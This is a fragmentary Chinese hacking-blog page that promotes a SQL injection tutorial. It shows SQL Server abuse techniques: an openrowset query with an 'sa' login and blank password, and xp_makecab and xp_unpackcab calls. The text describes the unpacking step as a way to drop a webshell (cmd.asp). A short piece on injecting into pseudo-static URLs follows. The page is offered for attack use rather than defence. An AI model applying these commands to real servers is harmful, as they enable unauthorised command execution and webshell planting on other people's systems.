凌风[0x0F]'s BloG

新方法SQL注入

令人蛋疼的文章,看之前一定要蛋定...

最强大,最全,最牛B的SQL注入教程,含电子书下载最强大,最全,最牛B的SQL注入教程,含电子书下载

1．关于Openrowset和Opendatasource

可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是（包括MSDN的列子）如下：


select * from openrowset('sqloledb','myserver';'sa';'','select * from
table')


可见（即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问，它必须跟在select后面，也就是说需要返回一个recordset 。
...

EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'

打包

EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'

解包，可以用于得到webshell

EXEC [master].[dbo].[xp_readerrorlog] 1,'d:\cmd.asp'
...

文/似曾相识

常规的伪静态页面如下：http://www.XXX.com/play/Diablo.html，在看到之前先要确定这个页面是静态还是伪静态，鉴别方法很多，也很简单这里就不说了。

例如关联的动态页面是game.php ，那么当用户访问后程序会自动转换成类似http://www.XXX.com/game.php?action=play&name=Diablo 的形式，当然这部分是PHP执行的所以在访问时看不到。